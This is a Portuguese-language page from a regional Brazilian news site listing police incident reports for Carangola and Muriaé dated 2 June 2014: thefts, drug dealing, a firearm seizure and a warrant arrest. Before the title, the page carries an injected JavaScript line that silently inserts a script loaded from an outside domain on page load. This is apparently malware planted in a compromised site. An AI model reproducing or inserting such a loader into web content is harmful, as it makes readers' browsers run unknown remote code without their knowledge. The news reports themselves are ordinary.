;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências Policiais Carangola e Região - 03/06/14. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências Policiais Carangola e Região – 03/06/14.

pmbn

OCORRÊNCIAS DE DESTAQUE MURIAÉ – 03/06/2014

                         75ª CIA PM- CARANGOLA-MG

TRÁFICO ILÍCITO DE DROGAS EM CARANGOLA-MG.

            EM 02/06/2014, por volta das 14hs35min, pela Rua Vista Alegre, bairro Triângulo, Zona Rural, militares depararam com o adolescente S.S.F., de 17 anos, conhecido traficante de drogas, conversando com dois indivíduos, e visualizaram o momento em que o adolescente entregou um pequeno objeto para um dos indivíduos. O adolescente infrator ao avistar a VP jogou no chão uma bucha de maconha e se posicionou para busca, sendo ainda localizado em seu bolso R$ 75,50 em moeda corrente. Os outros dois indivíduos conseguiram evadir, sendo que o adolescente infrator foi apreendido, e durante o registro do fato o adolescente infrator desacatou o policial militar com palavras de baixo calão e ameaçou-o de futura agressão, sendo o fato lançado no relatório do registro evento de defesa social.

 VEÍCULO LOCALIZADO EM FARIA LEMOS -MG.

            Em 02/06/14, por volta das 13hs10min, a vítima A.S., de 21 anos, compareceu ao Destacamento Policial e relatou que teve sua motocicleta HONDA CG 125, LOR-2304, furtada no dia 30/05/14 em CARANGOLA, e que o autor teria evadido para a zona rural de FARIA LEMOS. Em rastreamento o autor J.B.S., de 22 anos, foi localizado escondendo a motocicleta em meio a uma propriedade rural, localizada no Córrego Ponte Branca, Zona Rural, e ao ser abordado confirmou ser o autor do furto na cidade de Carangola, e que trocaria o veículo por outro. O autor foi encaminhado à delegacia de polícia e o veículo removido pelo pátio credenciado do Detran.

                          76ª CIA PM – MURIAÉ

 PORTE ILEGAL DE ARMA DE FOGO EM MURIAÉ- MG.

            Em 02/06/2014, por volta das 12hs41min, policiais militares em patrulhamento pela Vila Cavalier, bairro Aeroporto, avistaram um indivíduo alto, magro, moreno, trajando bermuda estampada e camisa branca, quando este avistou a Viatura Policial evadiu sentindo a um escadão, e durante a fuga deixou cair próximo a um matagal, a arma de fogo que portava, sendo uma Garrucha dois canos sem munição, que foi apreendida, sendo que o autor não foi localizado.

CUMPRIMENTO DE MANDADO DE PRISÃO EM MURIAÉ-MG.

            Em 02/06/2014, por volta das 10hs35min, policiais militares em patrulhamento pela Rua Paschoal Bernardino, bairro Centro, abordaram em um veículo o condutor E.C.B.F., de 29 anos, e em consulta ao sistema informatizado, foi constatado que havia seu desfavor um mandado de prisão em aberto. Ante ao exposto foi dado voz de prisão ao envolvido o qual foi conduzido à Delegacia de Polícia.

VEICULO LOCALIZADO EM MURIAÉ-MG.

            Em 02/06/2014, por volta das 07hs20min, policiais militares após denúncia anônima compareceram à Rua Antônio Afonso Sobrinho, bairro José Cirilo, e depararam com o veículo Caminhão M.BENZ, modelo L 1518, ANO 1989, de cor branca, placa GQX-9122, PONTE NOVA-MG, aberto e com as chaves na ignição, e durante consulta oa sistema informatizado foi constatado que o veículo foi roubado em PONTE NOVA no dia 31/05/2014, sendo o veículo removido para o pátio credenciado do Detran.

 FURTO DE VEÍCULO CONSUMADO E LOCALIZADO EM MURIAÉ-MG.

            Em 02/06/2014, por volta das 02hs00min, policiais militares compareceram à Rua Boa Esperança, bairro Dornelas, onde fizeram contato com a vítima V.N.G., de 22 anos, e esta relatou que estacionou o veículo VW/GOL SPECIAL, cor branca, ano 2003, em frente sua residência por voltas das 22:00 horas do dia 01/06/2014, e hoje verificou que o referido veículo havia sido furtado. O automóvel estava com aproximadamente 20 litros de gasolina e continha em seu interior o CRLV e uma botija de gás. Posteriormente o veículo foi localizado na rua Santa Maria, bairro Planalto, por um militar que estava no horário de folga, que sabedor do furto do veículo acionou a guarnição policial que providenciou o recolhimento do veículo ao pátio credenciado.

      ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.